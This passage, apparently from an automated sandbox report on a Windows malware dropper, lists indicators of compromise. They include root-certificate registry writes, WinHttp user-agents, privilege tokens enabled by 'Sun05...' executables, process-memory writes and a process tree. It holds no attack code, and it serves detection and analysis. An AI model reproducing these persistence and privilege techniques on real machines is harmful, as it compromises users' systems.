Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "Microsoft Speech HW Voice Activation - English (United States)" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Sun05ac1b0207d3ff3b8.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun05ac1b0207d3ff3b8.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 15 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 61 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 139 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4468 powershell.exe 4468 powershell.exe 2216 Sun05532f7abc.exe 2216 Sun05532f7abc.exe 4468 powershell.exe 4468 powershell.exe 4468 powershell.exe 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 4512 WerFault.exe 4512 WerFault.exe 4512 WerFault.exe 4512 WerFault.exe 4512 WerFault.exe 4512 WerFault.exe 4512 WerFault.exe 4512 WerFault.exe 4512 WerFault.exe 4512 WerFault.exe 4512 WerFault.exe 4512 WerFault.exe 4512 WerFault.exe 4512 WerFault.exe 4512 WerFault.exe 4512 WerFault.exe 4512 WerFault.exe 4512 WerFault.exe 4512 WerFault.exe 4512 WerFault.exe 3064 Explorer.EXE 3064 Explorer.EXE 4888 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3064 Explorer.EXE -
Suspicious behavior: MapViewOfSection 18 IoCs
pid Process 2216 Sun05532f7abc.exe 7144 MicrosoftEdgeCP.exe 7144 MicrosoftEdgeCP.exe 5500 stgbdvv 7144 MicrosoftEdgeCP.exe 7144 MicrosoftEdgeCP.exe 7144 MicrosoftEdgeCP.exe 7144 MicrosoftEdgeCP.exe 7144 MicrosoftEdgeCP.exe 7144 MicrosoftEdgeCP.exe 7672 stgbdvv 7144 MicrosoftEdgeCP.exe 7144 MicrosoftEdgeCP.exe 6788 MicrosoftEdgeCP.exe 6788 MicrosoftEdgeCP.exe 6360 stgbdvv 6788 MicrosoftEdgeCP.exe 6788 MicrosoftEdgeCP.exe -
Suspicious behavior: SetClipboardViewer 2 IoCs
pid Process 3728 2967757.exe 3872 5077757.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 740 Sun05d60bc3b96248e5.exe Token: SeAssignPrimaryTokenPrivilege 740 Sun05d60bc3b96248e5.exe Token: SeLockMemoryPrivilege 740 Sun05d60bc3b96248e5.exe Token: SeIncreaseQuotaPrivilege 740 Sun05d60bc3b96248e5.exe Token: SeMachineAccountPrivilege 740 Sun05d60bc3b96248e5.exe Token: SeTcbPrivilege 740 Sun05d60bc3b96248e5.exe Token: SeSecurityPrivilege 740 Sun05d60bc3b96248e5.exe Token: SeTakeOwnershipPrivilege 740 Sun05d60bc3b96248e5.exe Token: SeLoadDriverPrivilege 740 Sun05d60bc3b96248e5.exe Token: SeSystemProfilePrivilege 740 Sun05d60bc3b96248e5.exe Token: SeSystemtimePrivilege 740 Sun05d60bc3b96248e5.exe Token: SeProfSingleProcessPrivilege 740 Sun05d60bc3b96248e5.exe Token: SeIncBasePriorityPrivilege 740 Sun05d60bc3b96248e5.exe Token: SeCreatePagefilePrivilege 740 Sun05d60bc3b96248e5.exe Token: SeCreatePermanentPrivilege 740 Sun05d60bc3b96248e5.exe Token: SeBackupPrivilege 740 Sun05d60bc3b96248e5.exe Token: SeRestorePrivilege 740 Sun05d60bc3b96248e5.exe Token: SeShutdownPrivilege 740 Sun05d60bc3b96248e5.exe Token: SeDebugPrivilege 740 Sun05d60bc3b96248e5.exe Token: SeAuditPrivilege 740 Sun05d60bc3b96248e5.exe Token: SeSystemEnvironmentPrivilege 740 Sun05d60bc3b96248e5.exe Token: SeChangeNotifyPrivilege 740 Sun05d60bc3b96248e5.exe Token: SeRemoteShutdownPrivilege 740 Sun05d60bc3b96248e5.exe Token: SeUndockPrivilege 740 Sun05d60bc3b96248e5.exe Token: SeSyncAgentPrivilege 740 Sun05d60bc3b96248e5.exe Token: SeEnableDelegationPrivilege 740 Sun05d60bc3b96248e5.exe Token: SeManageVolumePrivilege 740 Sun05d60bc3b96248e5.exe Token: SeImpersonatePrivilege 740 Sun05d60bc3b96248e5.exe Token: SeCreateGlobalPrivilege 740 Sun05d60bc3b96248e5.exe Token: 31 740 Sun05d60bc3b96248e5.exe Token: 32 740 Sun05d60bc3b96248e5.exe Token: 33 740 Sun05d60bc3b96248e5.exe Token: 34 740 Sun05d60bc3b96248e5.exe Token: 35 740 Sun05d60bc3b96248e5.exe Token: SeDebugPrivilege 1788 WerFault.exe Token: SeDebugPrivilege 4236 Sun050462125c7d35.exe Token: SeDebugPrivilege 4468 powershell.exe Token: SeDebugPrivilege 3548 2.exe Token: SeDebugPrivilege 5084 4402665.exe Token: SeDebugPrivilege 1352 PublicDwlBrowser1100.exe Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeDebugPrivilege 4436 BearVpn 3.exe Token: SeRestorePrivilege 4888 WerFault.exe Token: SeBackupPrivilege 4888 WerFault.exe Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE Token: SeCreatePagefilePrivilege 3064 Explorer.EXE Token: SeShutdownPrivilege 3064 Explorer.EXE -
Suspicious use of FindShellTrayWindow 30 IoCs
pid Process 3064 Explorer.EXE 2648 setup_2.tmp 5476 ultramediaburner.tmp 6444 installer.exe 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 3064 Explorer.EXE -
Suspicious use of SetWindowsHookEx 11 IoCs
pid Process 3064 Explorer.EXE 4244 MicrosoftEdge.exe 6884 MicrosoftEdgeCP.exe 6884 MicrosoftEdgeCP.exe 7196 cmd.exe 5052 MicrosoftEdge.exe 7144 MicrosoftEdgeCP.exe 7144 MicrosoftEdgeCP.exe 4364 MicrosoftEdge.exe 6788 MicrosoftEdgeCP.exe 6788 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4876 wrote to memory of 4920 4876 setup_x86_x64_install.exe 75 PID 4876 wrote to memory of 4920 4876 setup_x86_x64_install.exe 75 PID 4876 wrote to memory of 4920 4876 setup_x86_x64_install.exe 75 PID 4920 wrote to memory of 5016 4920 setup_installer.exe 76 PID 4920 wrote to memory of 5016 4920 setup_installer.exe 76 PID 4920 wrote to memory of 5016 4920 setup_installer.exe 76 PID 5016 wrote to memory of 1916 5016 setup_install.exe 79 PID 5016 wrote to memory of 1916 5016 setup_install.exe 79 PID 5016 wrote to memory of 1916 5016 setup_install.exe 79 PID 5016 wrote to memory of 4164 5016 setup_install.exe 80 PID 5016 wrote to memory of 4164 5016 setup_install.exe 80 PID 5016 wrote to memory of 4164 5016 setup_install.exe 80 PID 5016 wrote to memory of 4176 5016 setup_install.exe 83 PID 5016 wrote to memory of 4176 5016 setup_install.exe 83 PID 5016 wrote to memory of 4176 5016 setup_install.exe 83 PID 5016 wrote to memory of 3752 5016 setup_install.exe 82 PID 5016 wrote to memory of 3752 5016 setup_install.exe 82 PID 5016 wrote to memory of 3752 5016 setup_install.exe 82 PID 5016 wrote to memory of 3348 5016 setup_install.exe 81 PID 5016 wrote to memory of 3348 5016 setup_install.exe 81 PID 5016 wrote to memory of 3348 5016 setup_install.exe 81 PID 5016 wrote to memory of 3280 5016 setup_install.exe 87 PID 5016 wrote to memory of 3280 5016 setup_install.exe 87 PID 5016 wrote to memory of 3280 5016 setup_install.exe 87 PID 3348 wrote to memory of 3560 3348 cmd.exe 84 PID 3348 wrote to memory of 3560 3348 cmd.exe 84 PID 3348 wrote to memory of 3560 3348 cmd.exe 84 PID 5016 wrote to memory of 3688 5016 setup_install.exe 85 PID 5016 wrote to memory of 3688 5016 setup_install.exe 85 PID 5016 wrote to memory of 3688 5016 setup_install.exe 85 PID 5016 wrote to memory of 4224 5016 setup_install.exe 86 PID 5016 wrote to memory of 4224 5016 setup_install.exe 86 PID 5016 wrote to memory of 4224 5016 setup_install.exe 86 PID 5016 wrote to memory of 3024 5016 setup_install.exe 92 PID 5016 wrote to memory of 3024 5016 setup_install.exe 92 PID 5016 wrote to memory of 3024 5016 setup_install.exe 92 PID 5016 wrote to memory of 4112 5016 setup_install.exe 91 PID 5016 wrote to memory of 4112 5016 setup_install.exe 91 PID 5016 wrote to memory of 4112 5016 setup_install.exe 91 PID 5016 wrote to memory of 3980 5016 setup_install.exe 88 PID 5016 wrote to memory of 3980 5016 setup_install.exe 88 PID 5016 wrote to memory of 3980 5016 setup_install.exe 88 PID 4224 wrote to memory of 4236 4224 cmd.exe 90 PID 4224 wrote to memory of 4236 4224 cmd.exe 90 PID 3688 wrote to memory of 740 3688 cmd.exe 89 PID 3688 wrote to memory of 740 3688 cmd.exe 89 PID 3688 wrote to memory of 740 3688 cmd.exe 89 PID 3024 wrote to memory of 3288 3024 cmd.exe 94 PID 3024 wrote to memory of 3288 3024 cmd.exe 94 PID 4176 wrote to memory of 1848 4176 cmd.exe 93 PID 4176 wrote to memory of 1848 4176 cmd.exe 93 PID 4176 wrote to memory of 1848 4176 cmd.exe 93 PID 3280 wrote to memory of 1788 3280 cmd.exe 136 PID 3280 wrote to memory of 1788 3280 cmd.exe 136 PID 3752 wrote to memory of 2216 3752 cmd.exe 100 PID 3752 wrote to memory of 2216 3752 cmd.exe 100 PID 3752 wrote to memory of 2216 3752 cmd.exe 100 PID 4164 wrote to memory of 4420 4164 cmd.exe 99 PID 4164 wrote to memory of 4420 4164 cmd.exe 99 PID 4164 wrote to memory of 4420 4164 cmd.exe 99 PID 3980 wrote to memory of 4452 3980 cmd.exe 95 PID 3980 wrote to memory of 4452 3980 cmd.exe 95 PID 3980 wrote to memory of 4452 3980 cmd.exe 95 PID 4112 wrote to memory of 4404 4112 cmd.exe 96
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2344
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2616
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R2⤵PID:8004
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3064 -
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS833A2A44\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
